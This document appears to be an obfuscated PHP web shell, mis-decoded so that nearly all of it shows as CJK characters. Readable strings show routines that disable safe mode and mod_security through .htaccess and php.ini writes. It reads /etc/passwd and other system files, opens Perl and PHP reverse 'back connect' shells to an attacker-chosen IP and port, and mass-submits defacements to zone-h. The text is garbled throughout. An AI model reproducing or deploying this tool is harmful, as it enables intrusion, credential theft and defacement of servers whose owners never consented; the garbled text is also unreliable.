ㅳ猽栵ㅤ㕲㸧㬍ਠ‴昨㕭灴礨⑟偏協嬧ㅪㅸ❝⤦☡㕭灴礨⑟偏協嬧瀶❝⤩ഊ†⑟卅卓䥏乛浤椨⑟卅剖䕒嬧䡔呐彈体吧崩⸧ㅪㅸ❝‽⁦ㅬ猵㬍ਠ‵捨㈠✼挵湴㕲㸼獰ㅮ㹼⁕䑐⁄体卉䕒⁼㰯獰ㅮ㸼扲㸼扲㸼昲牭′湓㍢洴琽≧⡮㍬氬渳汬ⱴ栴献㍤灨㉳琮瘱氳㔬瑨㑳⸳摰琴洵⹶ㅬ㌵ⱴ栴献㍤灰㉲琮瘱氳㔩㬠爵琳牮⁦ㅬ猵㬢⁭㕴栲搽偏協㸼獰ㅮ㹈㉳琠㨼⽳瀱渾㰴湰㍴⁮ㅭ㔽∳摰栲獴∠瑹瀵㴢琵硴∠⁳㑺㔽≡椢 㸼獰ㅮ㹔㑭㔠㨼⽳瀱渾㰴湰㍴⁮ㅭ㔽∳摰琴洵∠瑹瀵㴢琵硴∠猴稵㴢㙩∠⼾㱳瀱渾倲牴›㰯獰ㅮ㸼㑮瀳琠渱洵㴢㍤灰㉲琢⁴祰㔽≴㕸琢⁳㑺㔽∶〢 㸼㑮瀳琠⁴祰㔽≳㍢洴琢⁶ㅬ㌵㴢㸾∠⼾㰯昲牭㸼⽣㕮琵爾✻ഊ†㕣栲•㱰爵⁣氱獳㴧浬㘧⁳瑹氵㴧∮⠵浰瑹⠤彐体呛❰㘧崩㼧搴獰氱示渲渵㬧㨧✩⸢洱牧㑮⵴㉰㩩灸✠㸢㬍ਠ†‴昨ℵ浰瑹⠤彐体呛❰㘧崩…☠ℵ浰瑹⠤彐体呛❰愧崩…☠ℵ浰瑹⠤彐体呛❰漧崩⤍ਠ†⁻ഊ††††․瀱捫㕴猽〻ഊ††††㑧渲爵弳猵牟ㅢ㉲琨瑲㌵⤻ഊ††††␵砵损琴洵㴤彐体呛❰愧崻ഊ††††⑴㑭㔽琴洵⠩㬍ਠ†††․洱硟琴洵㴤㕸㕣彴㑭㔫⑴㑭㔻ഊ††††⑨㉳琽⑟偏協嬧瀶❝㬍ਠ†††․瀲牴㍤瀽⑟偏協嬧灯❝㬍ਠ†††⁦㉲⠤㐽〻␴㱥椰〰㬤㐫⬩ഊ††††笍ਠ†††††․㈳琠⸽‧堧㬍ਠ†††⁽ഊ††††睨㑬㔨㘩笍ਠ†‍ਠ††††⑰ㅣ欵瑳⬫㬍ਠ†††††‴昨琴洵⠩‾․洱硟琴洵⥻ഊ††††††††††扲㔱欻ഊ††††††納ਠ†††††‍ਠ†††††․晰‽⁦猲捫㉰㕮⠧㍤瀺⼯✮⑨㉳琬․瀲牴㍤瀬․㕲牮㈬․㕲牳瑲Ⱐ椩㬍ਠ†††††‴昨⑦瀩笍ਠ†††††††††⁦睲㑴㔨⑦瀬․㈳琩㬍ਠ†††††††††⁦捬㉳㔨⑦瀩㬍ਠ†††††⁽ഊ††††††納ਠ††††㕣栲•⑰ㅣ欵瑳 ∠⸠爲㍮搨⠤瀱捫㕴猪敩⤯㘰慵Ⱐ愩‮•⁍䈩⁰ㅣ欵瑳‱瘵爱朴湧•⸠爲㍮搨⑰ㅣ欵瑳⼤㕸㕣彴㑭㔬⁡⤠⸠∠瀱捫㕴猠瀵爠猵挲湤∻ഊ††††‵捨㈠∼⽰爵㸢㬍ਠ†⁽ഊ††ഊ††㕣栲‧㰯搴瘾✻‍ਠ†ഊ††洱摦㈲琵爨⤻††††ഊ納਍੦㍮捴㐲渠洱摰爲挨⤍੻ഊ††洱摨㔱搨⤻ഊ††㕣栲•㱄㑶⁣氱獳㵨㔱搵爾㱣㕮琵爾∻ഊ††㑦⠵浰瑹⠤彐体呛✱樱砧崩☦ℵ浰瑹⠤彐体呛❰㘧崩⤍ਠ․当䕓卉低孭摩⠤当䕒噅剛❈呔偟䡏協❝⤮✱樱砧崠㴠昱汳㔻ഊ†㑦⠤䝌佂䅌卛❳祳❝㴽≷㑮∩ഊ†笍ਠ†․灲㉣㕳猽ㅲ爱礨ഊ††≓祳琵洠䥮昲∠㴾≳祳琵洴湦㈢Ⰽਠ†•䅣琴瘵⁃㉮渵捴㐲湳∠㴾•渵瑳琱琠ⴱ渢Ⰽਠढ刳湮㑮朠匵牶㑣㕳∠㴾•渵琠獴ㅲ琢Ⰽਠढ啳㕲⁁捣㈳湴猢‽㸠≮㕴″猵爢Ⰽਠढ卨㉷⁃㉭瀳琵牳∠㴾•渵琠瘴㕷∬ഊ††≁剐⁔ㅢ氵∠㴾•ㅲ瀠ⴱ∬ഊ††≉倠䌲湦㑧㍲ㅴ㐲渢‽㸠∴灣㉮昴朠⼱汬∍ਠ† 㬍ਠ†⁽ഊ†㕬猵ഊ†笠ഊ††⑰爲挵獳㴱牲ㅹ⠍ਠ†•偲㉣㕳猠獴ㅴ㍳∠㴾•灳‱㍸∬ഊ††≓祳氲朢‽㸢挱琠 㕴振獹獬㉧⹣㉮昢Ⰽਠ†•刵猲汶∠㴾•挱琠 㕴振爵猲汶⹣㉮昢Ⰽਠ†•䠲獴猢‽㸢挱琠⼵瑣⽨㉳瑳∬ഊ††≐ㅳ獷搢‽㸢挱琠⼵瑣⽰ㅳ獷搢Ⰽਠ†•䍰㌴湦㈢㴾≣ㅴ 灲㉣⽣瀳㑮昲∬ഊ††≖㕲猴㉮∽㸢挱琠⽰爲振瘵牳㐲渢Ⰽਠ†•卢㑮∽㸢汳‭ㅬ ㍳爯獢㑮∬ഊ††≉湴㕲爳灴猢㴾≣ㅴ 灲㉣⼴湴㕲爳灴猢Ⰽਠ†•汳ㅴ瑲∽㸢汳ㅴ瑲‭瘱∬ഊ††≕灴㑭㔢㴾∳灴㑭㔢Ⰽਠ†•䙳琱戢‽㸢挱琠⼵瑣⽦獴ㅢ∬ഊ††≈䑄⁓瀱挵∠㴾•摦‭栢ഊ††⤻納ਠ†‍ਠ†⁦㉲㔱捨⠤灲㉣㕳猠ㅳ․渠㴾․水湫⤍ਠ†⁻ഊ††††㕣栲‧㰱⁨爵昽∣∠㉮捬㑣欽≧⡮㍬氬渳汬ⱜ✧⸤水湫⸧尧⤢㸠簠✮⑮⸧⁼‼⼱㸧㬍ਠ†⁽ഊ††㕣栲•㰯挵湴㕲㸢㬠ഊ††‴昨ℵ浰瑹⠤彐体呛❰㘧崩⤍ਠ††笍ਠ†††‵捨㈠∼灲㔠捬ㅳ猽❭氶✠獴祬㔽❭ㅲ朴渭琲瀺楰砧‾∻ഊ††††㕣栲⁭ㅤ䕸⠤彐体呛❰㘧崩㬍ਠ†††‵捨㈠✼⽰爵㸧㬍ਠ††納ਠ††㕣栲•㰯搴瘾∻ഊ††⁭ㅤ昲㉴㕲⠩㬍ਠ††納ਠ††ഊ昳湣琴㉮⁭ㅤ猱昵⠩ഊ笍ਠ†⁭ㅤ栵ㅤ⠩㬍ਠ†‵捨㈠∼搴瘠捬ㅳ猽栵ㅤ㕲㸼挵湴㕲㸼桯㸼獰ㅮ㹼⁓䅆䔠䵏䑅⁁乄⁍佄⁓䕃啒䥔夠䑉十䉌䕄⁁乄⁐䕒䰠椰〠䥎呅剎䅌⁅剒佒⁂奐䅓匠簼⽳瀱渾㰯桯㹆㉬氲眴湧⁰桰⸴渴‱湤‮桴ㅣ挵獳⡭㉤⤠ㅮ搠瀵牬⠮桴ㅣ挵獳⥛挲湶㕲琠瀵牬‵硴㕮琴㉮‪⹰氠㴾‪⹳栠⁝⁦㑬㕳⁣爵ㅴ㔠㑮⁦㉬氲眴湧⁤㑲㱢爾簠∮⑇䱏䉁䱓嬧捷搧崮∠簼扲㸢㬍ਠ†‵捨㈠✼ㄠ桲㕦㴣′湣水捫㴢木渳汬Ɱ㍬氬尧灨瀮㑮㑜✬渳汬⤢㹼⁐䡐⹉义⁼‼⼱㸼ㄠ桲㕦㴣′湣水捫㴢木渳汬Ɱ㍬氬渳汬ⱜ✴渴尧⤢㹼‮桴ㅣ挵獳⡍㉤⤠簠㰯ㄾ㰱⁨爵昽⌠㉮捬㑣欽≧⡮㍬氬渳汬Ɱ㍬氬渳汬ⱜ❳桜✩∾簠⹨琱捣㕳猨瀵牬⤠簠㰯ㄾ㰯挵湴㕲㸧㬍ਠ†‴昨ℵ浰瑹⠤彐体呛❰愧崩…☠㑳猵琨⑟偏協嬧灡❝⤩ഊ††笍ਠ†․昴氽昲瀵渨⑇䱏䉁䱓嬧捷搧崮∮桴ㅣ挵獳∬≷∩㬍ਠ†⁦睲㑴㔨⑦㑬Ⱗ㱉晍㉤㍬㔠洲摟猵挳爴瑹⹣㸍੓㕣ⴭⴭⴭ䕮朴渵⁏晦ഊ匵挭ⴭⴭⵓ挱湐体吠佦昍਼⽉晍㉤㍬㔾✩㬍ਠ†⁦捬㉳㔨⑦㑬⤻ഊ†⁽ഊ†‴昨ℵ浰瑹⠤彐体呛❰㘧崩☦‴獳㕴⠤彐体呛❰㘧崩⤍ਠ†笍ਠ†․昴氽昲瀵渨⑇䱏䉁䱓嬧捷搧崮≰桰⸴渴∬≷∩㬍ਠ††⁦睲㑴㔨⑦㑬Ⱗ猱昵彭㉤㔽但䘍੤㑳ㅢ氵彦㍮捴㐲湳㵎低䔧⤻ഊ††⁦捬㉳㔨⑦㑬⤻ഊ††納ਠ†‴昨ℵ浰瑹⠤彐体呛❰漧崩…☠㑳猵琨⑟偏協嬧灯❝⤩ഊ††笍ਠ†․昴氽昲瀵渨⑇䱏䉁䱓嬧捷搧崮∮桴ㅣ挵獳∬≷∩㬍ਠ†⁦睲㑴㔨⑦㑬Ⱗ佰琴㉮猠䘲汬㉷卹浌㑮歳⁍㍬琴嘴㕷猠䥮搵砵猠䕸㕣䍇䤍ੁ摤呹瀵‱灰水挱琴㉮⽸⵨瑴灤ⵣ朴‮獨ഊ䅤摈ㅮ摬㕲⁣朴⵳捲㑰琠⹰氍ੁ摤䠱湤氵爠捧㐭獣爴灴‮灬✩㬍ਠ††晣氲猵⠤昴氩㬠ഊ††納ਠ†‵捨㈠∼扲㸼⽤㑶㸢㬍ਠ†⁭ㅤ昲㉴㕲⠩㬍ਠ†‍੽ഊഊ昳湣琴㉮⁭ㅤ挲湮㕣琨⤍੻ഊ⁭ㅤ栵ㅤ⠩㬍ਠ③ㅣ歟挲湮㕣瑟瀽≉祅癤塎祌慊灢㐹睚塊獄兰㙣慕杕愹樱慖く眰䭊䝬桚䝒祐坬㍚塒晙塒癢㑧歑噊䡖汳睘卫杦䡷杚䝬汋䍊䙣湊癣樲杊䍆换㑉灏眰䭊䡂桚䝒祐塎癙慴桚䝒祘慬㍋䍒䉕此块穆摌䍁欱坆歚䡉灉䡸㡉䝒灚卧㑒塊祢潉敉䍑桘䝵㑋味乃㑒督洹ぢ稶湚塒督洹ぢ慊楢浆瑚卧湤䝎睊祫㝄兰穢慎牚塑㉕〹䑓ざ啌䍂兒氹䩔歖啌䍂呔ぎ䱘㙎啕歖䉔卷杊䡂祢潒癋卂㡦䍂欱坕㉉歖祣洹祏㑁歉噸㍉㑫㝄兰橢慩㍚坎か䙎偑ぴ䙖䍷杊䡂桚䝒祋卂㡦䍂欱坕㉉歖祣洹祏㑁歉噸㍉㑫㝄兰癣䝖㍋䙎啒䕬佌䍁㑐㑚呔ぎ䱒噑㑋味乃洹睚坵㉕㙒䕔㙖啌䍁㑐㑚呔ぎ䱒噑㑋味乃洹睚坵㉕㙒䕒噊卌䍁㑐㑚呔ぎ䱒噑㑋味乃湎楣潒汢卧湌慊灢㐹稱䍁琱卣灏眰䭙慸癣慕㉕㙒䕓啵灏眰䭙慸癣慕㉕㙒䕔㙖啋味乃济獢潎汋䙎啒䕖单㑫㜢㬍ਠ㕣栲•㱤㑶⁣氱獳㵨㔱搵爾㱣㕮琵爾㱨漾㱳瀱渾簠偅剌⁁乄⁐䡐⡴桲㔱摳⤠䉁䍋⁃低久䍔⁼㰯獰ㅮ㸼⽨漾∻ഊ‵捨㈠∼昲牭†㉮匳扭㑴㵜≧⡮㍬氬渳汬Ⱗ扣瀧ⱴ栴献猵牶㕲⹶ㅬ㌵ⱴ栴献瀲牴⹶ㅬ㌵⤻爵琳牮⁦ㅬ猵㭜∾㱳瀱渾偅剌⁂䅃䬠䍏乎䕃吼⽳瀱渾㱢爾䥐㨠㰴湰㍴⁴祰㔽❴㕸琧⁮ㅭ㔽❳㕲瘵爧⁶ㅬ㌵㴧∮․当䕒噅剛❒䕍佔䕟䅄䑒❝‮∧㸠倲牴㨠㰴湰㍴⁴祰㔽❴㕸琧⁮ㅭ㔽❰㉲琧⁶ㅬ㌵㴧畵漧㸠㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✾㰯昲牭㸢㬍ਠ㕣栲•㱢爾㱦㉲洠′湓㍢洴琽尢木渳汬Ɱ㍬氬❰桰✬瑨㑳⹳㕲瘵爮瘱氳㔬瑨㑳⹰㉲琮瘱氳㔩㭲㕴㍲渠昱汳㔻尢㸼獰ㅮ㹐䡐⁂䅃䬠䍏乎䕃吼⽳瀱渾㱢爾䥐㨠㰴湰㍴⁴祰㔽❴㕸琧⁮ㅭ㔽❳㕲瘵爧⁶ㅬ㌵㴧∮․当䕒噅剛❒䕍佔䕟䅄䑒❝‮∧㸠倲牴㨠㰴湰㍴⁴祰㔽❴㕸琧⁮ㅭ㔽❰㉲琧⁶ㅬ㌵㴧畵漧㸠㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✾㰯昲牭㸼⽣㕮琵爾∻ഊ‴昨㑳猵琨⑟偏協嬧瀶❝⤩⁻ഊउ昳湣琴㉮⁣昨⑦Ⱔ琩⁻ഊउत眠㴠䁦㉰㕮⠤昬≷∩′爠䁦㍮捴㐲湟㕸㑳瑳⠧昴氵彰㍴彣㉮琵湴猧⤻ഊउऴ昨⑷⥻ഊउउ䁦睲㑴㔨⑷ⱀ戱猵敵彤㕣㉤㔨⑴⤩㬍ਉउी晣氲猵⠤眩㬍ਉउ納ਉॽഊउ㑦⠤彐体呛❰㘧崠㴽‧扣瀧⤠笍ਉउ捦⠢⽴浰⽢挮灬∬③ㅣ歟挲湮㕣瑟瀩㬍ਉउ␲㍴‽⁭ㅤ䕸⠢瀵牬 瑭瀯扣⹰氠∮⑟偏協嬧灡❝⸢•⸤彐体呛❰漧崮∠㘾⽤㕶⽮㍬氠愾☶…∩㬍ਉउ㕣栲•㱰爵⁣氱獳㵭氶⁳瑹氵㴧洱牧㑮⵴㉰㩩灸✾匳捣㕳獦㍬汹′瀵渵搠爵瘵牳㔠獨㕬氠琲•⸤彐体呛❰愧崮∺∮⑟偏協嬧灯❝⸢㱢爾䌲湮㕣琴湧⸮⸼⽰爵㸢㬍ਠ†††††⁀㍮水湫⠢⽴浰⽢挮灬∩㬍ਉॽഊ††††㑦⠤彐体呛❰㘧崽㴧灨瀧⤍ਠ笍ਠ†††††‍ੀ猵瑟琴洵彬㑭㑴 〩㬍ਤ㑰‽․彐体呛❰愧崻‍ਤ瀲牴‽⑟偏協嬧灯❝㬠††ഊ④栳湫彳㑺㔠㴠㙵〰㬍ਤ睲㑴㕟ㄠ㴠渳汬㬍ਤ㕲爲牟ㄠ㴠渳汬㬍ਤ獨㕬氠㴠✳渱洵‭ㄻ⁷㬠㑤㬠⽢㑮⽳栠ⴴ✻ഊ⑤ㄵ洲渠㴠〻ഊ⑤㕢㍧‽‰㬍ਵ捨㈠∼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㸢㬍਍਴映⡦㍮捴㐲湟㕸㑳瑳⠧灣湴江昲牫✩⤠笍ਉഊत瀴搠㴠灣湴江昲牫⠩㬍ਉഊऴ映⠤瀴搠㴽‭㘩⁻ഊउ㕣栲•䌱湴⁦㉲次㱢爾∻ഊउ㕸㑴⠶⤻ഊॽഊऍਉ㑦 ⑰㑤⤠笍ਉव破琨〩㬠‍ਉ納਍ਉ㑦 瀲猴硟猵瑳㑤⠩‽㴠ⴶ⤠笍ਉव捨㈠≅牲㉲㨠䌱渧琠猵瑳㑤⠩㱢爾∻ഊउ㕸㑴⠶⤻ഊॽഊഊत搱㕭㉮‽‶㬍੽‵汳㔠笍ਉ㕣栲•坁剎䥎䜺⁆ㄴ氵搠琲⁤ㄵ洲渴猵⸠⁔栴猠㑳ⁱ㌴琵⁣㉭洲渠ㅮ搠渲琠昱琱氼扲㸢㬍੽ഊഊ捨搴爨∯∩㬍਍ਲ਼洱獫⠰⤻ഊഊ⑳㉣欠㴠晳㉣欲瀵渨␴瀬․瀲牴Ⱐ␵牲渲Ⱐ␵牲獴爬⁯〩㬍਴映⠡⑳㉣欩⁻ഊव捨㈠∤㕲牳瑲 ␵牲渲⤢㬍ਉ㕸㑴⠶⤻ഊ納਍਍ਤ搵獣爴灴㉲獰㕣‽‱牲ㅹ⠍ਠ†〠㴾‱牲ㅹ⠢瀴瀵∬•爢⤬†ഊ†‶‽㸠ㅲ爱礨≰㑰㔢Ⱐ≷∩Ⱐ‍ਠ†愠㴾‱牲ㅹ⠢瀴瀵∬•眢⤠†ഊ⤻ഊഊ⑰爲挵獳‽⁰爲损㉰㕮⠤獨㕬氬․搵獣爴灴㉲獰㕣Ⱐ⑰㑰㕳⤻ഊഊ㑦 ℴ獟爵猲㍲挵⠤灲㉣㕳猩⤠笍ਉ㕣栲•䕒剏刺⁃ㅮ❴⁳瀱睮⁳栵汬㱢爾∻ഊव破琨㘩㬍੽ഊഊഊ䁳瑲㔱浟猵瑟扬㉣欴湧⠤瀴瀵獛そⰠ〩㬍ੀ獴爵ㅭ彳㕴形氲捫㑮木⑰㑰㕳嬶崬‰⤻ഊ䁳瑲㔱浟猵瑟扬㉣欴湧⠤瀴瀵獛慝Ⱐ〩㬍ੀ獴爵ㅭ彳㕴形氲捫㑮木⑳㉣欬‰⤻ഊഊ㕣栲•匳捣㕳獦㍬汹′瀵渵搠爵瘵牳㔠獨㕬氠琲․㑰㨤瀲牴㱢爾∻ഊഊ睨㑬㔠⠶⤠笍ਉ㑦 昵㉦⠤猲捫⤩⁻ഊउ㕣栲•䕒剏刺⁓栵汬⁣㉮渵捴㐲渠琵牭㑮ㅴ㕤㱢爾∻ഊउ扲㔱欻ഊॽഊഊऴ映⡦㔲昨⑰㑰㕳嬶崩⤠笍ਉव捨㈠≅剒佒㨠卨㕬氠灲㉣㕳猠琵牭㑮ㅴ㕤㱢爾∻ഊउ扲㔱欻ഊॽഊഊऍਉ⑲㔱摟ㄠ㴠ㅲ爱礨⑳㉣欬․瀴瀵獛㙝Ⱐ⑰㑰㕳孡崩㬍ਉ⑮㍭彣栱湧㕤彳㉣欵瑳㵀獴爵ㅭ彳㕬㕣琨⑲㔱摟ㄬ․睲㑴㕟ㄬ․㕲爲牟ㄬ⁮㍬氩㬍਍ਉ㑦 㑮弱牲ㅹ⠤猲捫Ⱐ⑲㔱摟ㄩ⤠笍ਉऴ映⠤搵戳朩‵捨㈠≓佃䬠剅䅄㱢爾∻ഊउ␴湰㍴㵦爵ㅤ⠤猲捫Ⱐ④栳湫彳㑺㔩㬍ਉऴ映⠤搵戳朩‵捨㈠≓佃䬺․㑮瀳琼扲㸢㬍ਉ०睲㑴㔨⑰㑰㕳嬰崬․㑮瀳琩㬍ਉ納਍ਉ㑦 㑮弱牲ㅹ⠤瀴瀵獛㙝Ⱐ⑲㔱摟ㄩ⤠笍ਉऴ映⠤搵戳朩‵捨㈠≓呄何吠剅䅄㱢爾∻ഊउ␴湰㍴‽⁦爵ㅤ⠤瀴瀵獛㙝Ⱐ④栳湫彳㑺㔩㬍ਉऴ映⠤搵戳朩‵捨㈠≓呄何吺․㑮瀳琼扲㸢㬍ਉ०睲㑴㔨⑳㉣欬․㑮瀳琩㬍ਉ納਍ਉഊऴ映⠴湟ㅲ爱礨⑰㑰㕳孡崬․爵ㅤ弱⤩⁻ഊउ㑦 ⑤㕢㍧⤠㕣栲•協䑅剒⁒䕁䐼扲㸢㬍ਉत㑮瀳琠㴠晲㔱搨⑰㑰㕳孡崬․捨㍮歟猴稵⤻ഊउ㑦 ⑤㕢㍧⤠㕣栲•協䑅剒㨠␴湰㍴㱢爾∻ഊउ晷爴琵⠤猲捫Ⱐ␴湰㍴⤻ഊॽഊ納਍੦捬㉳㔨⑳㉣欩㬍੦捬㉳㔨⑰㑰㕳嬰崩㬍੦捬㉳㔨⑰㑰㕳嬶崩㬍੦捬㉳㔨⑰㑰㕳孡崩㬍ੰ爲损捬㉳㔨⑰爲挵獳⤻ഊഊ㕣栲•㰯灲㔾∻ഊ納਍੽†‍ਠ㕣栲•㰯搴瘾∻ഊ⁭ㅤ昲㉴㕲⠩㬍੽ഊ昳湣琴㉮⁚㉮㕈⠤㍲氬․栱捫㕲Ⱐ⑨ㅣ歭㉤㔬⑲㕳㉮Ⱐ⑳㑴㔠⤍੻ഊत欠㴠挳牬弴渴琨⤻ഊॣ㍲江猵琲灴⠤欬⁃啒䱏偔录剌Ⱐ␳牬⤻ഊॣ㍲江猵琲灴⠤欬䍕剌佐呟偏協ⱴ爳㔩㬍ਉ挳牬彳㕴㉰琨⑫Ⱐ䍕剌佐呟偏協䙉䕌䑓Ⱒ搵昱挵爽∮⑨ㅣ欵爮∦搲洱㑮㘽∮․猴琵⸢♨ㅣ歭㉤㔽∮⑨ㅣ歭㉤㔮∦爵ㅳ㉮㴢⸤爵猲温㬍ਉ挳牬彳㕴㉰琨⑫ⱃ啒䱏偔彆佌䱏坌佃䅔䥏丬⁴爳㔩㬍ਉ挳牬彳㕴㉰琨⑫Ⱐ䍕剌佐呟剅呕剎呒䅎卆䕒Ⱐ瑲㌵⤻ഊत欳扲ㄠ㴠挳牬張砵挨⑫⤻ഊॣ㍲江捬㉳㔨⑫⤻ഊॲ㕴㍲渠⑫㍢爱㬍੽ഊ昳湣琴㉮⁭ㅤ稲渵栨⤍੻ഊ††洱摨㔱搨⤻ഊ††㑦⠡昳湣琴㉮張破獴猨❣㍲江瘵牳㐲渧⤩ഊ††笍ਠ†††‵捨㈠∼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㸼挵湴㕲㸼昲湴⁣㉬㉲㵲㕤㹐䡐⁃啒䰠乏吠䕘䥔㰯昲湴㸼⽣㕮琵爾㰯灲㔾∻ഊ††納ਠ†‵捨㈠∼搴瘠捬ㅳ猽栵ㅤ㕲㸼挵湴㕲㸼扲㸢㬍ਠ†‵捨㈠✼桯㸼獰ㅮ㹼婏久ⵈ⁍䅓匠䑅䙁䍅删簼⽳瀱渾㰯桯㸍ਠ†‼昲牭†㉮匳扭㑴㴢木渳汬Ɱ㍬氬瑨㑳⹤㕦ㅣ㕲⹶ㅬ㌵ⱴ栴献栱捫洲搵⹶ㅬ㌵ⱴ栴献搲洱㑮⹶ㅬ㌵⤻爵琳牮⁦ㅬ猵㬢‾ഊ††㱳瀱渾簠串琴昴㕲⁼㰯獰ㅮ㸼扲㸍਼㑮瀳琠瑹瀵㴢琵硴∠渱洵㵤㕦ㅣ㕲⁳㑺㔽≵〢⁶ㅬ㌵㴢䅴琱捫㕲∠⼾㱢爾ഊ㱳㕬㕣琠渱洵㵨ㅣ歭㉤㔾ഊ㰲灴㐲渠㸭ⴭⴭⴭⵓ䕌䕃吭ⴭⴭⴭⴼ⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶∾歮㉷渠瘳汮㕲ㅢ㑬㑴礠⠴⸵⸠㍮瀱瑣栵搠獹獴㕭⤼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡∠㸳湤㑳捬㉳㕤 渵眩⁶㍬渵爱戴水瑹㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢漢‾挲湦㑧㍲ㅴ㐲渠⼠ㅤ洴渮⁭㑳琱欵㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢產‾扲㍴㔠昲牣㔠ㅴ琱捫㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢椢‾猲挴ㅬ‵湧㑮㔵爴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢攢‾圵戠匵牶㕲‴湴爳猴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㜢‾圵戠匵牶㕲‵硴㕲渱氠洲搳氵‴湴爳猴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㠢‾䴱㑬⁓㕲瘵爠㑮瑲㍳㐲渼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∹∠㹆呐⁓㕲瘵爠㑮瑲㍳㐲渼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶〢‾卓䠠匵牶㕲‴湴爳猴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㘶∠㹔㕬渵琠匵牶㕲‴湴爳猴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㙡∠㹒偃⁓㕲瘵爠㑮瑲㍳㐲渼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶漢‾卨ㅲ㕳⁭㑳挲湦㑧㍲ㅴ㐲渼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶產‾佴栵爠匵牶㕲‴湴爳猴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㙩∠㹓兌⁉湪㕣琴㉮㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㙥∠㹕剌⁐㈴猲渴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㘷∠㹆㑬㔠䥮捬㍳㐲渼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶㠢‾佴栵爠圵戠䅰灬㑣ㅴ㐲渠戳朼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽∶㤢‾刵洲琵‱摭㑮㑳瑲ㅴ㑶㔠瀱渵氠ㅣ挵獳⁢爳琵昲牣㑮朼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡〢‾刵洲琵‱摭㑮㑳瑲ㅴ㑶㔠瀱渵氠ㅣ挵獳⁰ㅳ獷㉲搠朳㕳猴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢愶∠㹒㕭㉴㔠ㅤ洴渴獴爱琴瘵⁰ㅮ㕬‱捣㕳猠猲挴ㅬ‵湧㑮㔵爴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢慡∠㹁瑴ㅣ欠ㅧㄴ湳琠ㅤ洴渴獴爱琲爨瀱獳眲牤⁳琵ㅬ㑮术獮㑦昴湧⤼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡漢‾䅣挵獳⁣爵搵湴㐱汳⁴桲㈳杨⁍ㅮ⁉渠瑨㔠䴴摤氵‱瑴ㅣ欼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡產‾刵洲琵⁳㕲瘴挵⁰ㅳ獷㉲搠朳㕳猴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢慩∠㹒㕭㉴㔠猵牶㑣㔠瀱獳眲牤⁢爳琵昲牣㔼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡攢‾刵爲㍴㑮朠ㅦ琵爠ㅴ琱捫㑮朠瑨㔠䘴爵眱汬㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢愷∠㹒㕲㈳琴湧‱晴㕲‱瑴ㅣ欴湧⁴栵⁒㈳琵爼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡㠢‾䑎匠ㅴ琱捫⁴桲㈳杨⁳㉣㐱氠㕮朴渵㕲㑮朼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡㤢‾䑎匠ㅴ琱捫⁴桲㈳杨⁣ㅣ栵⁰㈴猲渴湧㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢漰∠㹎㉴‱瘱㑬ㅢ氵㰯㉰琴㉮㸍਼⽳㕬㕣琾㱢爾ഊ㱳㕬㕣琠‾ഊ㰲灴㐲渠㹎㉴‱瘱㑬ㅢ氵㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㘢‾䠵栮⸮樳獴⁦㉲⁦㍮ℼ⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≡∠㹒㕶㕮朵‱朱㑮獴⁴栱琠眵扳㑴㔼⼲灴㐲渾ഊ㰲灴㐲渠瘱氳㔽≯∠㹐㉬㑴㑣ㅬ⁲㔱猲湳㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢產‾䅳‱⁣栱汬㕮朵㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢椢‾䤠樳獴⁷ㅮ琠琲⁢㔠瑨㔠戵獴⁤㕦ㅣ㕲㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢攢‾倱瑲㐲琴獭㰯㉰琴㉮㸍਼㉰琴㉮⁶ㅬ㌵㴢㜢‾串琠ㅶㄴ氱扬㔼⼲灴㐲渾ഊ㰯猵氵捴㸼扲㸍਼琵硴ㅲ㔱⁮ㅭ㔽搲洱㑮⁣㉬猽≩〢⁲㉷猽∶椢㹌㑳琠佦⁄㉭ㄴ湳㰯琵硴ㅲ㔱㸍਼扲㸍਼㑮瀳琠瑹瀵㴢猳扭㑴∠瘱氳㔽∾㸢 